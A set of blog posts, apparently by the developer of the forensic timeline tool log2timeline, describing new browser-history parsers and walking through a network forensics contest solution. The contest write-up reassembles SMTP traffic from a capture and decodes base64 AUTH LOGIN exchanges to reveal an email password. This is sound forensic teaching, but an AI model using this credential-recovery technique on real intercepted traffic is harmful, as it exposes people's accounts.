SANS EU Forensics Summit

January 26th, 2010 kiddi No comments

I just wanted to write a short post about the upcoming SANS European Digital Forensics and Incident Response Summit, which will take place in London on the 19th and 20th of April.  I encourage everyone who has the chance to attend, since there are some very interesting talks, such as Jesse Kornblum’s talk about fuzzy hashing, Keith Foggon’s discussion of trends and techniques and Lee Whitfield’s Windows Shadow Volumes presentation.

I will also be there, talking about log2timeline.  The title of my talk is Mastering the Super Timeline – log2timeline style.  After the talk I will participate in a tool talk panel, so there is your chance to pound me with some difficult questions…

The abstract of my talk is:

Traditional timeline analysis can be extremely useful, yet it sometimes misses important events that are stored inside files on the suspect system (log files, OS artifacts).  By depending solely on a traditional filesystem timeline the investigator misses context that is necessary to get a complete and accurate description of the events that took place.  To achieve this goal of enlightenment we need to dig deeper and incorporate information found inside artifacts or log files into our timeline analysis and create some sort of super timeline.  These artifacts or log files could reside on the suspect system itself or on another device, such as a firewall or a proxy.  This talk will focus on the tool log2timeline, which is a framework built to parse different log files and artifacts to produce a super timeline in an easy, automatic fashion, designed to assist investigators in their timeline analysis.

So the talk will contain some of the work in my upcoming Gold paper, titled “Mastering the Super Timeline With log2timeline” (did anyone notice the similarities between the titles?).  The paper should be published soon, at least before the summit.

Version 0.41 of log2timeline published

January 22nd, 2010 kiddi No comments

I’ve just published version 0.41 of log2timeline; for a full list of the changes, read the changelog.  This is a recommended upgrade since it contains several bug fixes as well as enhancements to the tool.  I’ve added new input modules for Google’s Chrome History, Opera History, Firefox Bookmarks, and Windows Event Logs (EVTX).  I’ve also added a new output module, CEF, for the Common Event Format as designed by ArcSight, and improved a few other input modules (more on that later).

In my last post I talked about Opera history files as well as the bookmark feature of older versions of Firefox.  Since I’ve added support for bookmarks in older versions of Firefox (the ones that still store their bookmark information in the bookmarks.html file), I decided to include that information for the newer versions of the browser as well.  As of version 3, Firefox no longer stores bookmark information inside the bookmarks.html file.  Instead it stores it in the places.sqlite database, the same one that contains the browser history.  Therefore I upgraded the firefox3 input module to include information about bookmarks, which is stored in the moz_bookmarks table as well as in the moz_places table.  The SQL command used to pull out the bookmark information is the following:

SELECT moz_bookmarks.type,moz_bookmarks.title,moz_bookmarks.dateAdded,
moz_bookmarks.lastModified,moz_places.url,moz_places.title,
moz_places.rev_host,moz_places.visit_count
FROM moz_places, moz_bookmarks
WHERE
 moz_bookmarks.fk = moz_places.id
 AND moz_bookmarks.type <> 3

One field in the moz_bookmarks table is of special interest: the “type” field.  There are three different bookmark types:

  • 1 = A bookmark (URL)
  • 2 = A bookmark folder
  • 3 = Separator

The above SQL command returns all rows from the moz_bookmarks table (except separators) that have a corresponding row in the moz_places table.  This means that the SQL command in fact only returns bookmarked URLs, not folders.  So another query is made to get the necessary information about bookmark folders:

SELECT moz_bookmarks.title,moz_bookmarks.dateAdded,moz_bookmarks.lastModified
FROM moz_bookmarks
WHERE
 moz_bookmarks.type = 2
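
To see how the two queries behave side by side, here is a minimal Python sketch that runs them against an in-memory stand-in for places.sqlite.  The schema is cut down to the columns the queries touch and the three demo rows are made up for illustration; the real database has more columns.  The conversion helper assumes that dateAdded and lastModified hold microseconds since the Unix epoch, which is my understanding of how Firefox stores them.

```python
import sqlite3
from datetime import datetime, timezone

# Cut-down stand-in for places.sqlite: only the columns used by the queries.
SCHEMA = """
CREATE TABLE moz_places (id INTEGER PRIMARY KEY, url TEXT, title TEXT,
                         rev_host TEXT, visit_count INTEGER);
CREATE TABLE moz_bookmarks (id INTEGER PRIMARY KEY, type INTEGER, fk INTEGER,
                            title TEXT, dateAdded INTEGER, lastModified INTEGER);
"""

URL_QUERY = """
SELECT moz_bookmarks.type, moz_bookmarks.title, moz_bookmarks.dateAdded,
       moz_bookmarks.lastModified, moz_places.url, moz_places.title,
       moz_places.rev_host, moz_places.visit_count
FROM moz_places, moz_bookmarks
WHERE moz_bookmarks.fk = moz_places.id
  AND moz_bookmarks.type <> 3
"""

FOLDER_QUERY = """
SELECT moz_bookmarks.title, moz_bookmarks.dateAdded, moz_bookmarks.lastModified
FROM moz_bookmarks
WHERE moz_bookmarks.type = 2
"""


def build_demo_db():
    """Create an in-memory database with one folder, one URL and one separator."""
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    db.execute(
        "INSERT INTO moz_places VALUES (?, ?, ?, ?, ?)",
        (1, "http://www.sans.org/london08", "london08", "gro.snas.www.", 0),
    )
    db.executemany(
        "INSERT INTO moz_bookmarks VALUES (?, ?, ?, ?, ?, ?)",
        [
            (1, 2, None, "Bookmarks Menu", 1195573631000000, 1218738203000000),
            (2, 1, 1, "SANS London 2008", 1218784170000000, 1218784170000000),
            (3, 3, None, None, 1218784170000000, 1218784170000000),
        ],
    )
    return db


def prtime_to_utc(value):
    """Convert a timestamp, assumed to be microseconds since 1970, to UTC."""
    return datetime.fromtimestamp(value // 1_000_000, tz=timezone.utc)


if __name__ == "__main__":
    demo = build_demo_db()
    for row in demo.execute(URL_QUERY):
        print("URL   ", row[1], row[4], prtime_to_utc(row[2]))
    for title, added, modified in demo.execute(FOLDER_QUERY):
        print("Folder", title, prtime_to_utc(added), prtime_to_utc(modified))
```

The folder row has no fk value, so the join in the first query never returns it; that is the reason the second query is needed.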

This SQL command extracts all the dates associated with the bookmark folders.  There is another table within the places.sqlite database that contains dates: moz_items_annos.  This table contains additional information about bookmarks, namely the annotations that are made to bookmarks.  The table stores the time when an annotation was added to a bookmark as well as when it was last modified.  The SQL command used to extract this information from the places.sqlite database is:

SELECT moz_items_annos.content, moz_items_annos.dateAdded
,moz_items_annos.lastModified,moz_bookmarks.title,
moz_places.url,moz_places.rev_host
FROM moz_items_annos,moz_bookmarks,moz_places
WHERE
 moz_items_annos.item_id = moz_bookmarks.id
 AND moz_bookmarks.fk = moz_places.id

An example output of the newly upgraded firefox3 input module is the following:

log2timeline -f firefox3 -z local places.sqlite  | grep Bookmark
...
0|[Firefox3] User: smith Bookmark Annotation: [milw0rm exploits and 0day
exploits database] to bookmark [milw0rm] (http://www.milw0rm.com/)|0|0|0|0|
0|1195573631|1195573631|1195573631|1195573631
...
0|[Firefox3] User: smith Bookmark Folder [Bookmarks Menu]|0|0|0|0|0|
1218738203|1218738203|1195573631|1195573631
...
0|[Firefox3] User: smith  Bookmark URL SANS London 2008 (http://www.sans.org/london08)
[london08] count 0|0|0|0|0|0|1218784170|1218784170|1218784170|1218784170
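
For anyone who wants to post-process this output, the following Python sketch splits one line into its fields.  It assumes the pipe-separated layout of the mactime body format as I understand it (MD5, name, inode, mode, UID, GID, size, atime, mtime, ctime, crtime), and it assumes that a wrapped line from the listing above has been joined back into a single line first.  The names BodyEntry and parse_body_line are made up for this example.

```python
from datetime import datetime, timezone
from typing import NamedTuple


class BodyEntry(NamedTuple):
    md5: str
    name: str
    atime: int
    mtime: int
    ctime: int
    crtime: int


def parse_body_line(line):
    """Split one body-file line into its description and four timestamps."""
    md5, rest = line.rstrip("\r\n").split("|", 1)
    # The description is free text and may itself contain '|', so the nine
    # fixed fields are split off from the right-hand side.
    fields = rest.rsplit("|", 9)
    if len(fields) != 10:
        raise ValueError("not a body-file line: %r" % line)
    atime, mtime, ctime, crtime = (int(value) for value in fields[6:10])
    return BodyEntry(md5, fields[0], atime, mtime, ctime, crtime)


def as_utc(epoch):
    """Render an epoch value as an ISO 8601 string in UTC."""
    return datetime.fromtimestamp(epoch, tz=timezone.utc).isoformat()


# The bookmark folder entry from the output above, joined into one line.
DEMO_LINE = (
    "0|[Firefox3] User: smith Bookmark Folder [Bookmarks Menu]|0|0|0|0|0|"
    "1218738203|1218738203|1195573631|1195573631"
)

if __name__ == "__main__":
    entry = parse_body_line(DEMO_LINE)
    print(entry.name)
    print("atime ", as_utc(entry.atime))
    print("crtime", as_utc(entry.crtime))
```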

I’ve also upgraded the flash cookie, or Local Shared Object (sol), input module considerably.  The older version was not built to support many of the common flash cookies out there, so the new version should implement a parser for every known object type.  I have, however, seen some flash cookies with a considerably different binary structure that the input module is not capable of parsing.  These files might use an older version of the standard, and the current version of the sol input module is unable to parse them (and so is every other SOL editor/parser that I’ve seen).  I will not include any information about the structure of flash cookies in this post; that is reserved for a later post.

I’ve also decided to stop creating all my blog posts on this site and then re-posting some of them on the SANS forensics blog.  Instead I will post some of the blog posts solely on the SANS blog while others will only be here.  In that spirit I wrote a post about Google’s Chrome browser which can be read here.  My blog post about flash cookies will also be posted on the SANS forensics blog site.

Updates to log2timeline

January 5th, 2010 kiddi No comments

I’ve been working on a new version of log2timeline, which according to the roadmap is a “web history add-on”.  I started by creating an input module to parse the simple format of the Opera browser.  Opera maintains two main history files, the “Opera Global History” and the “Opera Direct History”, which are both in a plain text format (although the formats differ).  Besides these two files there is some timestamp information that can be gathered from the binary file download.dat as well as a few other binary files (I’ve already started to create an input module to parse the binary format).

The main history file of Opera is called the “Opera Global History”.  It is a plain text file where each visit is logged in four lines, with the following structure:

Title of the web site (as displayed in the title bar)
The URL of the visited site
Time of visit (in Epoch time format)
An integer, representing the popularity of the web site
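
A record layout like this is simple to walk through in code.  The sketch below is not the opera input module itself (which is written in Perl), just a small Python illustration of reading four lines at a time; the names OperaVisit and parse_global_history are made up, and the sample record reuses values that appear in the example output further down.

```python
from typing import Iterable, Iterator, NamedTuple


class OperaVisit(NamedTuple):
    title: str
    url: str
    visited: int      # time of visit, seconds since the epoch
    popularity: int


def parse_global_history(lines: Iterable[str]) -> Iterator[OperaVisit]:
    """Yield one OperaVisit for every complete group of four lines."""
    cleaned = [line.rstrip("\r\n") for line in lines]
    # Step through the file four lines at a time; a trailing partial
    # record (fewer than four lines) is ignored.
    for start in range(0, len(cleaned) - 3, 4):
        title, url, visited, popularity = cleaned[start:start + 4]
        yield OperaVisit(title, url, int(visited), int(popularity))


DEMO_LINES = [
    "mbl.is - Fréttir\n",
    "http://mbl.is/mm/frettir/\n",
    "1262716353\n",
    "-1\n",
]

if __name__ == "__main__":
    for visit in parse_global_history(DEMO_LINES):
        print(visit)
```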

The other history file is called “Opera Direct History”, which is an XML file that stores typed history (URLs that are typed into the browser).  The structure of the file is the following:

<?xml version="1.0" encoding="ENCODING"?>
<typed_history>
 <typed_history_item content="URL TYPED IN" type="text"
                  last_typed="DATE"/>
</typed_history>

The input module called opera is able to determine which history file is provided as an input to log2timeline and parse the file accordingly.
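
One plausible way to tell the two files apart is to look at how the file starts.  The Python sketch below shows that idea together with a small reader for the typed history entries; it is an assumption about how such a check could work, not a description of what the opera module actually does.  The function names are made up, and the last_typed value in the sample is a hypothetical format that is kept as a plain string.

```python
import xml.etree.ElementTree as ET


def detect_opera_history(data: bytes) -> str:
    """Guess the history type: 'direct' for the XML file, otherwise 'global'."""
    head = data.lstrip()
    if head.startswith(b"<?xml") and b"<typed_history" in head:
        return "direct"
    return "global"


def parse_direct_history(data: bytes):
    """Return (content, type, last_typed) for every typed_history_item."""
    root = ET.fromstring(data)
    return [
        (item.get("content"), item.get("type"), item.get("last_typed"))
        for item in root.iter("typed_history_item")
    ]


# Sample file; the last_typed value is a made-up placeholder.
DEMO_DIRECT = b"""<?xml version="1.0" encoding="utf-8"?>
<typed_history>
 <typed_history_item content="mbl.is" type="text"
                  last_typed="2010-01-05T18:32:32Z"/>
</typed_history>
"""

if __name__ == "__main__":
    print(detect_opera_history(DEMO_DIRECT))
    print(parse_direct_history(DEMO_DIRECT))
```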

An example usage is the following:

log2timeline -z local -f opera Opera\ Global\ History
Local timezone is: Atlantic/Reykjavik (GMT)
Start processing file/dir [Opera Global History] ...
Loading output file: mactime
Starting to parse file using format: [opera]
0|[Opera] User unkown visited http://www.opera.com/portal/startup/ (http:// \
www.opera.com/portal/startup/) [2419292]|0|0|0|0|0|1262716353|1262716353| \
1262716353|1262716353
0|[Opera] User unkown visited http://mbl.is/mm/frettir/ (mbl.is - Fréttir) \
 [-1]|0|0|0|0|0|1262716353|1262716353|1262716353|1262716353
0|[Opera] User unkown visited http://mbl.is/mm/vidskipti/frettir/2010/01/05/ \
fitch_laekkar_lanshaefismat/ (Fitch lækkar lánshæfismat - mbl.is) [-1]|0|0|0 \
|0|0|1262716386|1262716386|1262716386|1262716386

And for the direct history file:

log2timeline -z local -f opera Opera\ Direct\ History
Local timezone is: Atlantic/Reykjavik (GMT)
Start processing file/dir [Opera Direct History] ...
Loading output file: mactime
Starting to parse file using format: [opera]
0|[Opera] User unkown typed the URL mbl.is directly into the browser \
(type "text")|0|0|0|0|0|1262716352|1262716352|1262716352|1262716352

I’ve also added support for Google’s Chrome.  In short, Google Chrome stores its data in a SQLite database, not unlike Firefox (as of version 3), so creating an input module was quite quick for that browser.  The first version of the input module parses three tables:

  • urls – Contains information about each visited URL
  • visits – Contains the timestamp information from each URL
  • downloads – Contains information about the downloads

Going through Google Chrome’s setup is something that I will reserve for a future blog post, so only an example of the usage is given here.  This first version of the input module gathers basic information from the history file and displays it in a timeline; future versions will include more details (I need to do more research to determine some parts of the history format).

log2timeline -f chrome -z local History
Local timezone is: Atlantic/Reykjavik (GMT)
Start processing file/dir [History] ...
Loading output file: mactime
Starting to parse file using format: [chrome]
0|[Chrome] URL visited: http://tools.google.com/chrome/intl/en/welcome.html \
(Get started with Google Chrome) [count: 1] Host: tools.google.com (URL not \
typed directly)|0|0|0|0|0|1261044829|1261044829|1261044829|1261044829
0|[Chrome] URL visited: http://www.google.com/ (Google) [count: 1] Host: www.\
google.com (URL not typed directly)|0|0|0|0|0|1261044829|1261044829|1261044829|\
1261044829
0|[Chrome] URL visited: http://www.google.is/ (Google) [count: 1] Host: www.\
google.is visited from: http://www.google.com/ (URL not typed directly)|0|0|0\
|0|0|1261044829|1261044829|1261044829|1261044829
0|[Chrome] URL visited: http://www.google.is/search?hl=is&source=hp&q=try+a+\
single+google+searcg&btnG=Google+leit&lr= (try a single google searcg - Google\
 leit) [count: 1] Host: www.google.is visited from: http://www.google.is/ (URL \
not typed directly)|0|0|0|0|0|1261044876|1261044876|1261044876|1261044876
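
One detail worth illustrating is the timestamp itself.  This post does not describe how Chrome stores time, so the following Python sketch rests on an assumption: that the visit time is kept as microseconds since 1601-01-01 UTC, which is how the format is commonly documented.  The function names are made up for this example.

```python
from datetime import datetime, timezone

# Seconds between 1601-01-01 and 1970-01-01 (both UTC).
WEBKIT_EPOCH_OFFSET = 11_644_473_600


def chrome_to_unix(webkit_microseconds: int) -> int:
    """Convert a Chrome timestamp (assumed microseconds since 1601) to epoch seconds."""
    return webkit_microseconds // 1_000_000 - WEBKIT_EPOCH_OFFSET


def unix_to_chrome(epoch_seconds: int) -> int:
    """Inverse of chrome_to_unix, with whole-second precision."""
    return (epoch_seconds + WEBKIT_EPOCH_OFFSET) * 1_000_000


if __name__ == "__main__":
    # 1261044829 is the epoch value shown in the example output above.
    raw = unix_to_chrome(1261044829)
    print(raw, "->", chrome_to_unix(raw))
    print(datetime.fromtimestamp(chrome_to_unix(raw), tz=timezone.utc))
```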

Then today I saw a post by H. Carvey about browser forensics where he talked about the bookmark file contained in Firefox’s profile folder.  He discussed the bookmark file and the fact that there are fields within it with timestamps, most notably the ADD_DATE and LAST_MODIFIED entries for folders, and the ADD_DATE and LAST_VISIT entries for the URLs.  So I decided to create a new input module to parse the file, ff_bookmark, which uses HTML::Parser to parse the HTML document and extract the timestamps that are contained within it.  Sample usage is:

log2timeline -f ff_bookmark -z local bookmarks.html
Local timezone is: Atlantic/Reykjavik (GMT)
Start processing file/dir [bookmarks.html] ...
Loading output file: mactime
Starting to parse file using format: [ff_bookmark]
0|[Firefox Bookmarks] User modified the bookmark file|0|0|0|0|0|1198266703|\
1198266703|1198266703|1198266703
0|[Firefox Bookmarks] User modified the bookmark folder [Bookmarks Toolbar \
Folder]|0|0|0|0|0|1194274986|1194274986|1194274986|1194274986
0|[Firefox Bookmarks] User created the bookmark Orðabanki [http://herdubreid\
.rhi.hi.is:1026/wordbank/search]|0|0|0|0|0|1189521200|1189521200|1189521200|\
1189521200
0|[Firefox Bookmarks] User visited the the bookmark [Orðabanki]|0|0|0|0|0|\
1195489127|1195489127|1195489127|1195489127
0|[Firefox Bookmarks] User created the bookmark SANS Institute - \\
International Training Events [http://feeds.feedburner.com/SansInstituteInter\
nationalEvents]|0|0|0|0|0|1193489569|1193489569|1193489569|1193489569
0|[Firefox Bookmarks] User created the bookmark folder [Öryggisvitund]|0|0|0|\
0|0|1191448948|1191448948|1191448948|1191448948
0|[Firefox Bookmarks] User modified the bookmark folder [Öryggisvitund]|0|0\
|0|0|0|1193819896|1193819896|1193819896|1193819896
0|[Firefox Bookmarks] User created the bookmark ISC: Tip #1 [http://isc.sans.\
org/diary.html?storyid=3438]|0|0|0|0|0|1191448977|1191448977|1191448977|1191448977
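
The module itself is Perl and uses HTML::Parser, but the same idea can be sketched with Python’s html.parser.  The class below collects the ADD_DATE, LAST_MODIFIED and LAST_VISIT attributes from folder (H3) and bookmark (A) tags.  The class name and the sample document are made up for this illustration; the sample reuses a folder and a bookmark from the output above.

```python
from html.parser import HTMLParser


class BookmarkTimestamps(HTMLParser):
    """Collect (kind, attribute, epoch, label) tuples from a bookmarks.html file."""

    def __init__(self):
        super().__init__()
        self.events = []
        self._current = None   # (kind, attributes) of the tag being read
        self._text = []

    def handle_starttag(self, tag, attrs):
        # html.parser lower-cases tag and attribute names.
        if tag in ("a", "h3"):
            kind = "url" if tag == "a" else "folder"
            self._current = (kind, dict(attrs))
            self._text = []

    def handle_data(self, data):
        if self._current is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag in ("a", "h3") and self._current is not None:
            kind, attrs = self._current
            label = "".join(self._text).strip()
            for name in ("add_date", "last_modified", "last_visit"):
                value = attrs.get(name)
                if value and value.isdigit():
                    self.events.append((kind, name, int(value), label))
            self._current = None


DEMO_HTML = """<DL><p>
<DT><H3 ADD_DATE="1191448948" LAST_MODIFIED="1193819896">Öryggisvitund</H3>
<DL><p>
<DT><A HREF="http://isc.sans.org/diary.html?storyid=3438" ADD_DATE="1191448977">ISC: Tip #1</A>
</DL><p>
</DL><p>
"""


def extract_events(html_text):
    parser = BookmarkTimestamps()
    parser.feed(html_text)
    parser.close()
    return parser.events


if __name__ == "__main__":
    for event in extract_events(DEMO_HTML):
        print(event)
```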

These input modules are not part of the published log2timeline tool, but they are all available in the development version of the tool, which can be found here.

Finally a new version of log2timeline

November 25th, 2009 kiddi No comments

I’ve been working on a new version of log2timeline for a while now, and I finally managed to complete some testing on the new code.  There are some significant changes to the way that log2timeline works in the new version, 0.40.  Some of them are:

  • All timestamps are now normalized to UTC
  • The GUI, glog2timeline, has been updated so that it is feature compatible with log2timeline’s CLI front-end.
  • timescanner has been further developed so that it now can parse all the artifacts that log2timeline is capable of.

The full list of changes can be seen in the changelog.

The reason the timestamps are now normalized is that some timestamps are stored as UTC while others use the operating system’s timezone settings.  This might not be such a big problem when using the log2timeline CLI, since it only takes one file at a time and produces a body file.  However, the investigator had to know whether that particular file stored its timestamps in the local timezone or in UTC.

The real problem arises with the use of timescanner.  When timescanner is used, a directory is recursively searched for all parsable artifacts.  This means that the tool parses both the artifacts that have timestamps in UTC and those stored in the native timezone settings, and stores them in the same body file.  Timestamps in the same body file then differ by the timezone offset depending on their source, which causes problems during analysis.  For this reason all timestamps are now normalized so that the output is in UTC.  This means, however, that the investigator now needs to provide the timezone settings of the suspect machine both to the timescanner/glog2timeline/log2timeline tool and to mactime (if that tool is used to convert the body file to a working timeline).
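
The normalization step can be illustrated with a few lines of Python.  This is a deliberately simplified sketch, not the code used in log2timeline: it assumes the suspect machine’s timezone can be described by one fixed UTC offset, which ignores daylight saving time, and the function name is made up.

```python
from datetime import datetime, timedelta, timezone


def local_to_utc_epoch(naive_local: datetime, utc_offset_hours: float) -> int:
    """Interpret a naive local timestamp at a fixed UTC offset; return epoch seconds."""
    zone = timezone(timedelta(hours=utc_offset_hours))
    return int(naive_local.replace(tzinfo=zone).timestamp())


if __name__ == "__main__":
    stamp = datetime(2009, 10, 10, 15, 35, 16)
    # The same wall-clock time read as UTC and as UTC-4 ends up four hours apart.
    as_utc = local_to_utc_epoch(stamp, 0)
    as_minus_four = local_to_utc_epoch(stamp, -4)
    print(as_utc, as_minus_four, as_minus_four - as_utc)
```

An artifact that stores local time has to go through a conversion like this, while an artifact that already stores UTC must be left alone, which is why the tool needs to be told the timezone of the suspect machine.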

The new version of the tool has been tested only on a few test cases, so if you find any bugs in it or have comments, don’t hesitate to contact me, kristinn

Second Network Forensics Contest

November 23rd, 2009 kiddi 3 comments

I just wanted to go over my solution to the second network forensics contest.

First of all, a little disclaimer: since this is a competition where scripting is encouraged, I decided beforehand to write a script and not rely on any available tools to complete this task (or at least to minimize the use of existing tools).

To begin with, we know that Ann was being monitored closely, since she was an apparent flight risk.  After Ann’s disappearance the police bring along a network capture, claiming that it quite possibly indicates her whereabouts.

There are definitely some questions that need to be answered.  So to begin with, let’s examine the content quickly using tcpdump.  We want to see every IP address and port number that has sent any IP traffic.  So let’s begin by listing all the possible sources.

tcpdump -nn -r evidence02.pcap  | awk -F 'IP' '{print $2}' | \
awk '{print $1}' | sort -nu
reading from file evidence02.pcap, link-type EN10MB (Ethernet)
10.1.1.20.53
64.12.102.142.587
192.168.1.10.52111

And then to see all the destinations.

tcpdump -nn -r evidence02.pcap | grep IP  | awk -F '>' '{print $2}' \
| awk '{print $1}' | sort -nu
reading from file evidence02.pcap, link-type EN10MB (Ethernet)
10.1.1.20.53:
64.12.102.142.587:
192.168.1.30.514:
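
The same extraction can be sketched in Python for anyone who prefers that to awk.  The snippet assumes the usual text layout that tcpdump -nn prints for TCP and UDP packets (“IP source.port > destination.port:”); it does not handle lines without a port, such as ICMP.  The two sample lines are made up: the addresses come from this post, but the rest of each line is only a placeholder.

```python
import re

# Matches the "IP src.port > dst.port:" part of a tcpdump -nn text line.
ENDPOINTS = re.compile(r"\bIP (\S+) > (\S+):")


def split_endpoint(endpoint):
    """Split 'a.b.c.d.port' into ('a.b.c.d', port)."""
    host, _, port = endpoint.rpartition(".")
    return host, int(port)


def collect_endpoints(lines):
    """Return (sorted sources, sorted destinations) as (host, port) tuples."""
    sources, destinations = set(), set()
    for line in lines:
        match = ENDPOINTS.search(line)
        if match is None:
            continue  # not an IPv4 packet line
        sources.add(split_endpoint(match.group(1)))
        destinations.add(split_endpoint(match.group(2)))
    return sorted(sources), sorted(destinations)


# Hypothetical sample lines, not taken from evidence02.pcap.
DEMO_LINES = [
    "15:35:16.000000 IP 192.168.1.159.1036 > 64.12.102.142.587: Flags [S], length 0",
    "15:35:16.100000 IP 64.12.102.142.587 > 192.168.1.159.1036: Flags [S.], length 0",
]

if __name__ == "__main__":
    sources, destinations = collect_endpoints(DEMO_LINES)
    print("sources:     ", sources)
    print("destinations:", destinations)
```

Collecting the endpoints in a set keeps every distinct address and port pair exactly once.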

We see traffic that is most likely DNS traffic (port 53) and then some other traffic that seems to be going to the server 64.12.102.142 on port 587.  Let’s examine the TCP traffic a little closer using a script that I wrote for the previous network forensics challenge, pcapcat.

pcapcat -r evidence02.pcap -b 0
[1] TCP 192.168.1.159:1036 -> 64.12.102.142:587
[2] TCP 192.168.1.159:1038 -> 64.12.102.142:587

We see that there are only two TCP connections that have been set up in this dump.  They correspond with the output that we saw from tcpdump, that is, Ann’s laptop is clearly communicating with the server 64.12.102.142 on port 587.  We need to examine this traffic a little closer, so let’s dump it using pcapcat.

pcapcat -r evidence02.pcap
[1] TCP 192.168.1.159:1036 -> 64.12.102.142:587
[2] TCP 192.168.1.159:1038 -> 64.12.102.142:587
Enter the index number of the conversation to dump or press enter to quit: 1
Dumping index value 1
Unable to determine output file
Give the name of the output file: file_1

And the second stream

pcapcat -r evidence02.pcap
[1] TCP 192.168.1.159:1036 -> 64.12.102.142:587
[2] TCP 192.168.1.159:1038 -> 64.12.102.142:587
Enter the index number of the conversation to dump or press enter to quit: 2
Dumping index value 2
Unable to determine output file
Give the name of the output file: file_2

Now we have two files, file_1 and file_2, that contain the reassembled TCP streams from the network capture.  Let’s start by checking what they are, trying to identify the content using the file command, which uses magic values to determine the file type.

file file_*
file_1: ASCII HTML document text, with CRLF line terminators
file_2: ASCII HTML document text, with CRLF line terminators

According to the file command, we are dealing with HTML documents.  Let’s see if that is correct:

head -3 file_1
220 cia-mc06.mx.aol.com ESMTP mail_cia-mc06.1; Sat, 10 Oct 2009 15:35:16 -0400
EHLO annlaptop
250-cia-mc06.mx.aol.com host-69-140-19-190.static.comcast.net

head -3 file_2
220 cia-mc07.mx.aol.com ESMTP mail_cia-mc07.1; Sat, 10 Oct 2009 15:37:56 -0400
EHLO annlaptop
250-cia-mc07.mx.aol.com host-69-140-19-190.static.comcast.net

By examining the first three lines of each of these files it becomes clear to us that this is in fact not an HTML document but an SMTP conversation.  So now we know that Ann was actually sending e-mails through the server 64.12.102.142.

What is this IP address?  Let’s examine that a bit:

 dig -x 64.12.102.142
; <<>> DiG 9.6.0-APPLE-P2 <<>> -x 64.12.102.142
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 57356
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 1
;; QUESTION SECTION:
;142.102.12.64.in-addr.arpa.    IN    PTR
;; ANSWER SECTION:
142.102.12.64.in-addr.arpa. 3600 IN    PTR    smtp-mc.mx.aol.com.
;; AUTHORITY SECTION:
102.12.64.in-addr.arpa.    3600    IN    NS    dns-02.ns.aol.com.
102.12.64.in-addr.arpa.    3600    IN    NS    dns-01.ns.aol.com.
;; ADDITIONAL SECTION:
dns-02.ns.aol.com.    51683    IN    A    205.188.157.232
...

We see that the reverse DNS (the PTR record) for the IP address points to a server that looks to be an SMTP server belonging to AOL, which can be further corroborated by issuing a whois query against the IP address:

whois  64.12.102.142
OrgName:    America Online, Inc.
OrgID:      AMERIC-158
Address:    10600 Infantry Ridge Road
City:       Manassas
StateProv:  VA
PostalCode: 20109
Country:    US
NetRange:   64.12.0.0 - 64.12.255.255
CIDR:       64.12.0.0/16
NetName:    AOL-MTC
NetHandle:  NET-64-12-0-0-1
Parent:     NET-64-0-0-0-0
NetType:    Direct Assignment
NameServer: DNS-01.NS.AOL.COM
NameServer: DNS-02.NS.AOL.COM
Comment:
RegDate:    1999-12-13
Updated:    1999-12-16
RTechHandle: AOL-NOC-ARIN
RTechName:   America Online, Inc.
RTechPhone:  +1-703-265-4670
RTechEmail:  domains@aol.net
# ARIN WHOIS database, last updated 2009-10-15 20:00
# Enter ? for additional hints on searching ARIN's WHOIS database.

So we now know that Ann did in fact send two e-mails through this server, which belongs to AOL.  Now we need to examine the conversation more closely.  To do that I created a script called smtp_anex (SMTP ANalyse and EXtraction tool).  So let’s use that script to analyse the traffic:

./smtp_anex -r file_1 -d data_1
------------------------------------------------------------
 SMTP_ANEX (SMTP ANALYSIS AND EXTRACTION)
------------------------------------------------------------
Information from e-mail header
 Mail from:  sneakyg33k@aol.com
 Recipient:  sec558@gmail.com
Information from e-mail body
 Mail from:  "Ann Dercover" <sneakyg33k@aol.com>
 Mail to  :  <sec558@gmail.com>
 Subject  :  lunch next week
Authentication information:
 Username: sneakyg33k@aol.com
 Password: 558r00lz
Header information:
 date :  Sat, 10 Oct 2009 07
 x-mimeole :  Produced By Microsoft MimeOLE V6.00.2900.2180
 x-mailer :  Microsoft Outlook Express 6.00.2900.2180
 content-type :  multipart/alternative;
 boundary="----=_nextpart_000_0006_01ca497c.3e4b6020" :
 x-priority :  3
 x-msmail-priority :  Normal
 mime-version :  1.0
 message-id :  <000901ca49ae$89d698c0$9f01a8c0@annlaptop>
Additional information:
 data_response: 250 OK
 cmd_ehlo: HASH(0x8b3610)
 banner: 220 cia-mc06.mx.aol.com esmtp mail_cia-mc06.1; sat, 10 oct 2009 15:35:16 -0400
 auth_leftovers: 235 - AUTHENTICATION SUCCESSFUL
 data_cmd_response: 354 start mail input, end with "." on a line by itself
 header: HASH(0x8b6ec0)
------------------------------------------------------------
 The message content
------------------------------------------------------------
-------- Text --------
Sorry-- I can't do lunch next week after all. Heading out of town. =
Another time! -Ann
-------- HTML --------
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=Content-Type content="text/html; =
charset=iso-8859-1">
<META content="MSHTML 6.00.2900.2853" name=GENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=#ffffff>
<DIV><FONT face=Arial size=2>Sorry-- I can't do lunch next week =
after all.
Heading out of town. Another time! -Ann</FONT></DIV></BODY></HTML>

By default the script goes through the SMTP conversation and plucks out the relevant data.

It then both prints the data on screen and saves it to files (the printing to screen can be silenced using the option -q).  I used the option -d to save all the data in the folder “data_1”, which now contains the following files:

  • 1-HTML.html
  • 1-RAW.txt
  • 1-Text.txt
  • 1-info.txt

We can clearly see from the output that Ann was sending this e-mail from the address sneakyg33k@aol.com and was sending it to the address sec558@gmail.com.  The content of the conversation was (again taken from the output of the script):

Sorry-- I can't do lunch next week after all. Heading out of town. =
Another time! -Ann

This looks quite suspicious.  Ann is claiming that she cannot do lunch because she is heading out of town?

We also see the username and password that Ann uses in this conversation:

Authentication information:
 Username: sneakyg33k@aol.com
 Password: 558r00lz

The authentication information that the script reads comes from the command AUTH that is issued during the SMTP conversation:

AUTH LOGIN
334 VXNlcm5hbWU6
c25lYWt5ZzMza0Bhb2wuY29t
334 UGFzc3dvcmQ6
NTU4cjAwbHo=
235 AUTHENTICATION SUCCESSFUL

This is a very common authentication mechanism (LOGIN), where base64 is used to encode the messages.  If we just decode it, we get:

S: 334 Username:
C: sneakyg33k@aol.com
S: 334 Password:
C: 558r00lz
S: 235 AUTHENTICATION SUCCESSFUL

where S: denotes the server’s side of the communication and C: the client’s.  But we do not need to do this manually; the script does this for us.
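
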